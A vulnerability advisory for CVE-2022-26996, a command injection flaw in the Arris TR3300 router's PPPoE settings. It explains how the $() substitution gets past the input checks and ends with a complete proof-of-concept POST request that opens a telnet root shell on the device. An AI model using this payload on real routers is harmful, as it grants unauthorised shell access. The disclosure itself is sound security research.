Headline

CVE-2022-26996: my_vuln/13.md at main · wudipjq/my_vuln

Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the pppoe function via the pppoe_username, pppoe_passwd, and pppoe_servicename parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

2 years ago

CVE

Open in Source

#vulnerability #web #ubuntu #linux #git

ARRIS Vulnerability

Vendor:ARRIS

Product:TR3300

Version:1.0.13(Download Link:https://arris.secure.force.com/consumers/ConsumerProductDetail?p=a0ha000000OlZ68AAF&c=SURFboard%20Routers)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:[email protected]

Vulnerability description

We found an Command Injection vulnerability in ARRIS router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

Remote Command Execution

In setup.cgi binary:

In the router’s pppoe function(wan_pppoe.html), pppoe_username、pppoe_passwd、pppoe_servicename is directly passed by the attacker, so we can control the pppoe_username、pppoe_passwd、pppoe_servicename to attack the OS.

First, accept and process the content of the field(pppoe_username、pppoe_password、pppoe_service), and then call the function nvram_set to store this input.

In rc_apps binary:

As you can see here, in sub_40D424 function, the initial input will be extracted.

In sub_408290 function, save these unsafe user inputs in variable a2.

Call the function nv_set to store this input.

In start_ppp binary:

Eventually, in ftext function, the initial input will cause command injection.

Supplement

BUT!!!

When receiving user input, there are very strict checks. But we can use $() to bypass it!

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

PoC

We set pppoe_username as $(/usr/sbin/utelnetd -l /bin/sh -p 10005), and the router will excute it,such as:

POST /setup.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 242 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/wan_pppoe.html Upgrade-Insecure-Requests: 1

pppoe_enable=&pppoe_username=$(/usr/sbin/utelnetd -l /bin/sh -p 10005)&pppoe_passwd=abc123&pppoe_servicename=pjqwudi&pppoe_mtu=1492&h_pppoe_enable=enable&h_pppoe_dod=disable&todo=save&this_file=wan_pppoe.html&next_file=wan_pppoe.html&message=